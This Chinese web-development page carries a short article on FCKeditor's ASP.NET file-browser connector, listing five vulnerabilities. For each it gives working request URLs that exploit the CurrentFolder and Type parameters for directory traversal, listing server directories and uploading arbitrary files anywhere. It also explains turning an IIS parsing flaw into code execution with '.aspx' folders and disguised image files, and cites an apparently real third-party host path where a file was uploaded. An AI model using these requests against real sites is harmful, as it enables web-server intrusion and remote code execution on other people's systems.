首页
网页制作
网络编程
脚本专栏
数据库
网站运营
网络安全
平面设计
CMS教程
搜索
建站极客
网络编程
网页编辑器
正文
FCKeditor 新闻组件的一些程序漏洞
所属分类:
网络编程
/
网页编辑器
阅读数: 1722
收藏 0
赞 0
分享
1 CurrentFolder 参数,可以在网站中不同目录新建文件夹,参数使用 ../../来篡改参数,进入不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=CreateFolder&Type=Image&CurrentFolder=../../..%2F&NewFolderName=aspx.asp
2 CurrentFolder 参数,根据返回的XML信息可以查看网站所有的目录,比如 “../../../”进入不同的目录,让后通过XML返回的消息就可以看到没有权限的页面browser/default/connectors/aspx/connector.aspx?Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2F
3 上传文件时,通过修改CurrentFolder参数,可以将文件上传到不同的目录
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
4 同时修改Type 和CurrentFolder 参数,可以上传任意类型文件到网站任意目录,基本上网站就完蛋了。
/browser/default/connectors/aspx/connector.aspx?Command=FileUpload&Type=Image&CurrentFolder=%2F
http://samsungfriend.local.opentide.com.cn/upload/fckroots/Image/asp.asp/asp.asp
5 通过创建文件夹的功能,创建名字带有.aspx的文件夹,如:file.aspx等,利用文件解析漏洞,在该文件夹下上传有代码的.jpg 或.rar等文件(实际文件是.aspx,把文件名该后缀),上传之后就可以利用漏洞执行代码了。 如:www.xxx.com/upload/file.aspx/123.jpg 输入之后,代码被成功执行。
更多精彩内容
其他人还在看
FCKEditor常用Js代码,获取FCK内容,统计FCK字数,向FCK写入指定代码
FCKEditor常用Js代码,获取FCK内容,统计FCK字数,向FCK写入指定代码,使用FCKEditor的朋友可以参考下。增加编辑器的人性化功能。
评论 0
收藏 0
赞 0
分享
CKEditor网页编辑器 中文使用说明
安装CKEditor是一件容易的工作,只需要按照下面的简单步骤就可以完成。多测试。
评论 0
收藏 0
赞 0
分享
FCKeditor 和 SyntaxHighlighter 代码高亮插件的整合
FCKeditor 和 SyntaxHighlighter 代码高亮插件的整合方法,里面有下载,可以根据需要结合自己的fckeditor版本。
评论 0
收藏 0
赞 0
分享
eWebEditor 请选择一个有效的文件的解决方法
解决eWebEditor上传图片提示 请选择一个有效的文件
评论 0
收藏 0
赞 0
分享
Ewebeditor 不能粘贴或复制的解决方法
在调试网站后台时,遇见用EWEBEDITOR编辑内容时,不能从其他文件来源粘贴到里面.
评论 0
收藏 0
赞 0
分享
javascript fckeditor编辑器取值与赋值实现代码
这篇文章对于使用fckeditor编辑器的朋友是个不错应用,主要介绍的是js对fckeditor的取值与赋值操作,fckeditor是个不错的比较方便的扩展功能的编辑器。
评论 0
收藏 0
赞 0
分享
Html 编辑器粘贴内容过滤技术详解
最近在解决数据粘贴方面取得了不少进展,作为Html在线编辑器所必须具备的技术,在这里详细给大家介绍并提供实现参考。
评论 0
收藏 0
赞 0
分享
Js FCKeditor的值获取和修改的代码小结
FCKeditor编辑器是比较流行的一款编辑器,很多cms系统都在使用,免费而功能强大。容易扩展等特性赢得了大家的喜爱。
评论 0
收藏 0
赞 0
分享
22个国外的Web在线编辑器收集
本文搜集了 22 个 Web 在线编辑器,它们基本代表了当前 Web 编辑器的现状。
评论 0
收藏 0
赞 0
分享
FCKeditor添加自定义按钮的方法
FCKLang是语言包对象,您只要打开FCK/editor/lang/下面的相应语言包添加相应的名称属性就可以了,比如:MyAlbum打开我的像册。注意大小写!至此我们的添加工作已完成。
评论 0
收藏 0
赞 0
分享
查看更多
网络赚钱
更多
淘宝客服退款竟是诈骗新招 南昌网友17.5万元险被骗走
网上赚钱怎么赚钱?网上兼职的方法有哪些
最强PS网银汇款截图:轻松骗走网店17万奢侈品
复制网赚项目
如何适当提高垃圾站Google
营销型网站建设提高网站转化率的方法
站长故事
更多
站长故事 新站两个月权重上升到3的经验分享
写给所有站长:其实没必要参加SEO培训
我认识的互联网活化石金山劳模雷军
就是这7个步骤 让我6个月做到了100万用户
浅谈新手站长在网站运营中如何去养站?
网站SEO反面案例 7万RMB建设的企业网站哪里出了问题?